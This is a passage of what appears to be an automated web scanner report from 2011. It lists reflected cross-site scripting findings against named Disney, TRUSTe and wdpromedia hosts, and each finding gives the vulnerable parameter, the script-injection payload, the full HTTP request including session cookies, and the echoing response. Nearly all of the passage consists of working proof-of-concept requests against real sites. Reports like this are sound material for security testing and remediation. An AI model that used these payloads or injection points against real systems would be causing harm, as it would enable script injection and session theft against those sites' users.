The value of the styleMiddleLine request parameter is copied into the HTML document as plain text between tags. The payload f3fbf<script>alert(1)</script>79b4d1ad707 was submitted in the styleMiddleLine parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /globalelements/chrome.css?secure=false&IE6=false&styleSet=mediumGray&styleText=null&styleTextHover=null&styleTextSelected=null&styleBackground=null&styleHover=null&styleMiddleLine=nullf3fbf<script>alert(1)</script>79b4d1ad707&styleSelected=null HTTP/1.1
Host: ahome.disney.go.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/special-offers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gi=usa|vt|stowe|broadband|44.500|-72.646|05672|e5c95626; mbox=check#true#1305508873|session#1305508812278-378400#1305510673; s_pers=%20s_gpv_pn%3Dwdpro%252Fdcl%252Fus%252Fen%252Fcontent%252Fhome%7C1305510612305%3B; s_sess=%20s_cc%3Dtrue%3B%20s_wdpro_lid%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|26E83DEA0516148B-600001A140014B4E[CE]

Response

HTTP/1.1 200 OK
Cache-Control: max-age=43200
Date: Mon, 16 May 2011 01:36:19 GMT
Content-Type: text/css; charset=iso-8859-1
Last-Modified: Mon, 16 May 2011 01:36:19 GMT
Server: Microsoft-IIS/6.0
From: DOLDISWEB14
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Set-Cookie: SWID=FA3E265E-A72E-45E9-B6EC-E7801FA9AEF1; path=/; expires=Mon, 16-May-2031 01:36:19 GMT; domain=.go.com;
Cache-Expires: Mon, 16 May 2011 13:36:19 GMT
X-UA-Compatible: IE=EmulateIE7
Content-Length: 7340
Connection: keep-alive

#gde_chromeContainer ul,#gde_chromeContainer ol,#gde_chromeContainer li,#gde_chromeContainer pre,#gde_chromeContainer form,#gde_chromeContainer fieldset,#gde_chromeContainer legend,#gde_chromeContaine
...[SNIP]...
0;}#gde_chromeContents {margin:0 auto;background-color:#868686;width:996px;height:48px;}#gde_chromeButtons {margin-top:0;float:left;width:634px;}.gde_chromeExploreButtons {border-bottom:solid 1px #nullf3fbf<script>alert(1)</script>79b4d1ad707;width:100%;}.gde_chromePlayButtons {height:23px;width:100%;}.gde_chromeButtonTD{width:400px;}.gde_chromeButtonContents a {outline: none;white-space: nowrap;cursor:hand;text-align:center;}.gde_homeLink
...[SNIP]...

5.15. http://ahome.disney.go.com/globalelements/chrome.css [styleSelected parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ahome.disney.go.com
Path:	/globalelements/chrome.css

Issue detail

The value of the styleSelected request parameter is copied into the HTML document as plain text between tags. The payload 624d5<script>alert(1)</script>d2c80c7c004 was submitted in the styleSelected parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /globalelements/chrome.css?secure=false&IE6=false&styleSet=mediumGray&styleText=null&styleTextHover=null&styleTextSelected=null&styleBackground=null&styleHover=null&styleMiddleLine=null&styleSelected=null624d5<script>alert(1)</script>d2c80c7c004 HTTP/1.1
Host: ahome.disney.go.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/special-offers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gi=usa|vt|stowe|broadband|44.500|-72.646|05672|e5c95626; mbox=check#true#1305508873|session#1305508812278-378400#1305510673; s_pers=%20s_gpv_pn%3Dwdpro%252Fdcl%252Fus%252Fen%252Fcontent%252Fhome%7C1305510612305%3B; s_sess=%20s_cc%3Dtrue%3B%20s_wdpro_lid%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|26E83DEA0516148B-600001A140014B4E[CE]

Response

HTTP/1.1 200 OK
Cache-Control: max-age=43200
Date: Mon, 16 May 2011 01:37:06 GMT
Content-Type: text/css; charset=iso-8859-1
Last-Modified: Mon, 16 May 2011 01:37:06 GMT
Server: Microsoft-IIS/6.0
From: DOLDISWEB10
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Set-Cookie: SWID=B07D636C-D39C-4932-8172-E85B90321B74; path=/; expires=Mon, 16-May-2031 01:37:06 GMT; domain=.go.com;
Cache-Expires: Mon, 16 May 2011 13:37:06 GMT
X-UA-Compatible: IE=EmulateIE7
Content-Length: 7379
Connection: keep-alive

#gde_chromeContainer ul,#gde_chromeContainer ol,#gde_chromeContainer li,#gde_chromeContainer pre,#gde_chromeContainer form,#gde_chromeContainer fieldset,#gde_chromeContainer legend,#gde_chromeContaine
...[SNIP]...
t:bold;}a.gde_chromeExploreButtonSelected, a.gde_chromeExploreButtonSelected:link, a.gde_chromeExploreButtonSelected:visited{width:100%;line-height:23px;height:24px;display:block;background-color:#null624d5<script>alert(1)</script>d2c80c7c004;color:#ffffff;text-decoration:none;font-size:11px;font-weight:bold;}a.gde_chromeExploreButton:hover{background-color:#acacac;color:#ffffff;}a.gde_chromeExploreButtonSelected:hover{background-color:#ac
...[SNIP]...

5.16. http://ahome.disney.go.com/globalelements/chrome.css [styleText parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ahome.disney.go.com
Path:	/globalelements/chrome.css

Issue detail

The value of the styleText request parameter is copied into the HTML document as plain text between tags. The payload 22159<script>alert(1)</script>8b3f9e779e5 was submitted in the styleText parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /globalelements/chrome.css?secure=false&IE6=false&styleSet=mediumGray&styleText=null22159<script>alert(1)</script>8b3f9e779e5&styleTextHover=null&styleTextSelected=null&styleBackground=null&styleHover=null&styleMiddleLine=null&styleSelected=null HTTP/1.1
Host: ahome.disney.go.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/special-offers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gi=usa|vt|stowe|broadband|44.500|-72.646|05672|e5c95626; mbox=check#true#1305508873|session#1305508812278-378400#1305510673; s_pers=%20s_gpv_pn%3Dwdpro%252Fdcl%252Fus%252Fen%252Fcontent%252Fhome%7C1305510612305%3B; s_sess=%20s_cc%3Dtrue%3B%20s_wdpro_lid%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|26E83DEA0516148B-600001A140014B4E[CE]

Response

HTTP/1.1 200 OK
Cache-Control: max-age=43200
Date: Mon, 16 May 2011 01:31:47 GMT
Content-Type: text/css; charset=iso-8859-1
Last-Modified: Mon, 16 May 2011 01:31:47 GMT
Server: Microsoft-IIS/6.0
From: DOLDISWEB10
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Set-Cookie: SWID=1DD3D030-C717-4860-AEFF-7A704C947B05; path=/; expires=Mon, 16-May-2031 01:31:47 GMT; domain=.go.com;
Cache-Expires: Mon, 16 May 2011 13:31:47 GMT
X-UA-COMPATIBLE: IE=EmulateIE7
Content-Length: 7379
Connection: keep-alive

#gde_chromeContainer ul,#gde_chromeContainer ol,#gde_chromeContainer li,#gde_chromeContainer pre,#gde_chromeContainer form,#gde_chromeContainer fieldset,#gde_chromeContainer legend,#gde_chromeContaine
...[SNIP]...
rrowButton:hover{background-color:#acacac;}a.gde_chromeExploreButton, a.gde_chromeExploreButton:link, a.gde_chromeExploreButton:visited{width:100%;line-height:23px;height:24px;display:block;color:#null22159<script>alert(1)</script>8b3f9e779e5;text-decoration:none;font-size:11px;font-weight:bold;}a.gde_chromeExploreButtonSelected, a.gde_chromeExploreButtonSelected:link, a.gde_chromeExploreButtonSelected:visited{width:100%;line-height:23px;h
...[SNIP]...

5.17. http://ahome.disney.go.com/globalelements/chrome.css [styleTextHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ahome.disney.go.com
Path:	/globalelements/chrome.css

Issue detail

The value of the styleTextHover request parameter is copied into the HTML document as plain text between tags. The payload 77a2d<script>alert(1)</script>f064bac5f03 was submitted in the styleTextHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /globalelements/chrome.css?secure=false&IE6=false&styleSet=mediumGray&styleText=null&styleTextHover=null77a2d<script>alert(1)</script>f064bac5f03&styleTextSelected=null&styleBackground=null&styleHover=null&styleMiddleLine=null&styleSelected=null HTTP/1.1
Host: ahome.disney.go.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/special-offers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gi=usa|vt|stowe|broadband|44.500|-72.646|05672|e5c95626; mbox=check#true#1305508873|session#1305508812278-378400#1305510673; s_pers=%20s_gpv_pn%3Dwdpro%252Fdcl%252Fus%252Fen%252Fcontent%252Fhome%7C1305510612305%3B; s_sess=%20s_cc%3Dtrue%3B%20s_wdpro_lid%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|26E83DEA0516148B-600001A140014B4E[CE]

Response

HTTP/1.1 200 OK
Cache-Control: max-age=43200
Date: Mon, 16 May 2011 01:32:45 GMT
Content-Type: text/css; charset=iso-8859-1
Last-Modified: Mon, 16 May 2011 01:32:45 GMT
Server: Microsoft-IIS/6.0
From: DOLDISWEB10
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Set-Cookie: SWID=2FC77E24-DC4C-42B8-B47C-38DEC7DE0BDE; path=/; expires=Mon, 16-May-2031 01:32:45 GMT; domain=.go.com;
Cache-Expires: Mon, 16 May 2011 13:32:45 GMT
X-UA-Compatible: IE=EmulateIE7
Content-Length: 7418
Connection: keep-alive

#gde_chromeContainer ul,#gde_chromeContainer ol,#gde_chromeContainer li,#gde_chromeContainer pre,#gde_chromeContainer form,#gde_chromeContainer fieldset,#gde_chromeContainer legend,#gde_chromeContaine
...[SNIP]...
e-height:23px;height:24px;display:block;background-color:#acacac;color:#ffffff;text-decoration:none;font-size:11px;font-weight:bold;}a.gde_chromeExploreButton:hover{background-color:#acacac;color:#null77a2d<script>alert(1)</script>f064bac5f03;}a.gde_chromeExploreButtonSelected:hover{background-color:#acacac;color:#null77a2d<script>
...[SNIP]...

5.18. http://ahome.disney.go.com/globalelements/chrome.css [styleTextSelected parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ahome.disney.go.com
Path:	/globalelements/chrome.css

Issue detail

The value of the styleTextSelected request parameter is copied into the HTML document as plain text between tags. The payload 6f590<script>alert(1)</script>b6bc8f7735 was submitted in the styleTextSelected parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /globalelements/chrome.css?secure=false&IE6=false&styleSet=mediumGray&styleText=null&styleTextHover=null&styleTextSelected=null6f590<script>alert(1)</script>b6bc8f7735&styleBackground=null&styleHover=null&styleMiddleLine=null&styleSelected=null HTTP/1.1
Host: ahome.disney.go.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/special-offers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gi=usa|vt|stowe|broadband|44.500|-72.646|05672|e5c95626; mbox=check#true#1305508873|session#1305508812278-378400#1305510673; s_pers=%20s_gpv_pn%3Dwdpro%252Fdcl%252Fus%252Fen%252Fcontent%252Fhome%7C1305510612305%3B; s_sess=%20s_cc%3Dtrue%3B%20s_wdpro_lid%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|26E83DEA0516148B-600001A140014B4E[CE]

Response

HTTP/1.1 200 OK
Cache-Control: max-age=43200
Date: Mon, 16 May 2011 01:33:42 GMT
Content-Type: text/css; charset=iso-8859-1
Last-Modified: Mon, 16 May 2011 01:33:42 GMT
Server: Microsoft-IIS/6.0
From: DOLDISWEB17
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Set-Cookie: SWID=6F96A674-2F26-47A6-A25C-B1C1B941123A; path=/; expires=Mon, 16-May-2031 01:33:42 GMT; domain=.go.com;
Cache-Expires: Mon, 16 May 2011 13:33:42 GMT
Content-Length: 7415
Connection: keep-alive

#gde_chromeContainer ul,#gde_chromeContainer ol,#gde_chromeContainer li,#gde_chromeContainer pre,#gde_chromeContainer form,#gde_chromeContainer fieldset,#gde_chromeContainer legend,#gde_chromeContaine
...[SNIP]...
chromeExploreButtonSelected, a.gde_chromeExploreButtonSelected:link, a.gde_chromeExploreButtonSelected:visited{width:100%;line-height:23px;height:24px;display:block;background-color:#acacac;color:#null6f590<script>alert(1)</script>b6bc8f7735;text-decoration:none;font-size:11px;font-weight:bold;}a.gde_chromeExploreButton:hover{background-color:#acacac;color:#ffffff;}a.gde_chromeExploreButtonSelected:hover{background-color:#acacac;color:#ff
...[SNIP]...

5.19. http://choices.truste.com/ca [c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://choices.truste.com
Path:	/ca

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload d79df<script>alert(1)</script>bd6ec20411 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att01&cid=0311m300x250&c=att01cont1f4061%3Cscript%3Ealert(1)%3C/script%3Ed96264b56bdd79df<script>alert(1)</script>bd6ec20411&w=300&h=250&zi=10002&plc=tr HTTP/1.1
Host: choices.truste.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/5

Response

5.20. http://choices.truste.com/ca [h parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://choices.truste.com
Path:	/ca

Issue detail

The value of the h request parameter is copied into the HTML document as plain text between tags. The payload f8c30<script>alert(1)</script>184723fc829 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att01&cid=0311m300x250&c=att01cont1f4061%3Cscript%3Ealert(1)%3C/script%3Ed96264b56bd&w=300&h=250f8c30<script>alert(1)</script>184723fc829&zi=10002&plc=tr HTTP/1.1
Host: choices.truste.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/5

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 21:19:00 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4571

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</script>d96264b56bd-anch','width':300,'height':250f8c30<script>alert(1)</script>184723fc829,'ox':0,'oy':0,'plc':'tr','iplc':'rel','intDivName':'te-clr1-att01cont1f4061<script>
...[SNIP]...

5.21. http://choices.truste.com/ca [plc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://choices.truste.com
Path:	/ca

Issue detail

The value of the plc request parameter is copied into the HTML document as plain text between tags. The payload 6c2e5<script>alert(1)</script>c1db2d67ea7 was submitted in the plc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att01&cid=0311m300x250&c=att01cont1f4061%3Cscript%3Ealert(1)%3C/script%3Ed96264b56bd&w=300&h=250&zi=10002&plc=tr6c2e5<script>alert(1)</script>c1db2d67ea7 HTTP/1.1
Host: choices.truste.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/5

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 21:19:00 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4512

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</script>d96264b56bd-anch','width':300,'height':250,'ox':0,'oy':0,'plc':'tr6c2e5<script>alert(1)</script>c1db2d67ea7','iplc':'rel','intDivName':'te-clr1-att01cont1f4061<script>
...[SNIP]...

5.22. http://choices.truste.com/ca [w parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://choices.truste.com
Path:	/ca

Issue detail

The value of the w request parameter is copied into the HTML document as plain text between tags. The payload 15459<script>alert(1)</script>7675ee448ea was submitted in the w parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att01&cid=0311m300x250&c=att01cont1f4061%3Cscript%3Ealert(1)%3C/script%3Ed96264b56bd&w=30015459<script>alert(1)</script>7675ee448ea&h=250&zi=10002&plc=tr HTTP/1.1
Host: choices.truste.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/5

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 21:19:00 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4571

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</script>d96264b56bd-anch','width':30015459<script>alert(1)</script>7675ee448ea,'height':250,'ox':0,'oy':0,'plc':'tr','iplc':'rel','intDivName':'te-clr1-att01cont1f4061<script>
...[SNIP]...

5.23. http://choices.truste.com/ca [zi parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://choices.truste.com
Path:	/ca

Issue detail

The value of the zi request parameter is copied into the HTML document as plain text between tags. The payload c8d63<script>alert(1)</script>12ddf7e69dc was submitted in the zi parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att01&cid=0311m300x250&c=att01cont1f4061%3Cscript%3Ealert(1)%3C/script%3Ed96264b56bd&w=300&h=250&zi=10002c8d63<script>alert(1)</script>12ddf7e69dc&plc=tr HTTP/1.1
Host: choices.truste.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/5

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 21:19:00 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4512

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</script>d96264b56bd_bi)','icon':'http://choices.truste.com/assets/admarker.png','icon_cam':'http://choices.truste.com/assets/adicon.png','iconText':'','aid':'att01','pid':'mec01','zindex':'10002c8d63<script>alert(1)</script>12ddf7e69dc','cam':'2'};

   var tecabaseurl = 'choices.truste.com';

   truste.ca.addEvent(window, 'load', function() {
       if(!truste.defjsload) {
           var element = document.createElement('script');
           element.src = '
...[SNIP]...

5.24. http://dcl.wdpromedia.com/media/dcl_v0400/Global/Promo/220x102/whyChooseDisney-Cruise.png [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dcl.wdpromedia.com
Path:	/media/dcl_v0400/Global/Promo/220x102/whyChooseDisney-Cruise.png

5.28. http://dcl.wdpromedia.com/services/en_US/htmlQQ/jsQuickQuote [&qqElement parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dcl.wdpromedia.com
Path:	/services/en_US/htmlQQ/jsQuickQuote

Issue detail

The value of the &qqElement request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ed5b1'%3balert(1)//e077333c670 was submitted in the &qqElement parameter. This input was echoed as ed5b1';alert(1)//e077333c670 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /services/en_US/htmlQQ/jsQuickQuote?&qqElement=DisneyQuickQuoteed5b1'%3balert(1)//e077333c670&qqPropKey=DCL2SQQProperties_BookingGenie_en_US&qqLoggedIn=false HTTP/1.1
Host: dcl.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Cnection: Close
Content-Length: 194169
Content-Type: text/javascript; charset=iso-8859-1
Pragma: cache
Server: barista/3.3.5
Cache-Control: max-age=1200
Expires: Mon, 16 May 2011 01:44:43 GMT
Date: Mon, 16 May 2011 01:24:43 GMT
Connection: close

/*<script>*/
/*
* This module purposely does not bog the client down with null continuous checks due to initial checks.
* No client-side JavaScript should be modifying the HTML QQ DOM, unless you wa
...[SNIP]...
ange the event function to include a safe zone
                                       // for the calendar button image as well
       'qqCalendars': Array(),            // array of all available calendar objects
       'qqElement': 'DisneyQuickQuoteed5b1';alert(1)//e077333c670',    // the qq container element ID, as a string
       'qqTravelMinLength': Array(),    // array of integers for minimum travel length; ID matches the calendar it
                                       // interfaces with, e.g. qqTravelMinL
...[SNIP]...

5.29. http://dcl.wdpromedia.com/services/en_US/htmlQQ/jsQuickQuote [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dcl.wdpromedia.com
Path:	/services/en_US/htmlQQ/jsQuickQuote

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6089a"><script>alert(1)</script>4b7e2c4925d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /6089a"><script>alert(1)</script>4b7e2c4925d/en_US/htmlQQ/jsQuickQuote?&qqElement=DisneyQuickQuote&qqPropKey=DCL2SQQProperties_BookingGenie_en_US&qqLoggedIn=false HTTP/1.1
Host: dcl.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

5.30. http://dcl.wdpromedia.com/services/en_US/htmlQQ/jsQuickQuote [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dcl.wdpromedia.com
Path:	/services/en_US/htmlQQ/jsQuickQuote

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 30002<script>alert(1)</script>5fbba82f226 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services30002<script>alert(1)</script>5fbba82f226/en_US/htmlQQ/jsQuickQuote?&qqElement=DisneyQuickQuote&qqPropKey=DCL2SQQProperties_BookingGenie_en_US&qqLoggedIn=false HTTP/1.1
Host: dcl.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
X-Cnection: Close
Content-Length: 156
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.5
Date: Mon, 16 May 2011 01:25:22 GMT
Connection: close
Vary: Accept-Encoding

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/services30002<script>alert(1)</script>5fbba82f226/en_US/htmlQQ/jsQuickQuote</BODY></HTML>

5.31. http://dcl.wdpromedia.com/services/en_US/htmlQQ/jsQuickQuote [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dcl.wdpromedia.com
Path:	/services/en_US/htmlQQ/jsQuickQuote

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 61d5d<script>alert(1)</script>9f047ac3d3a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

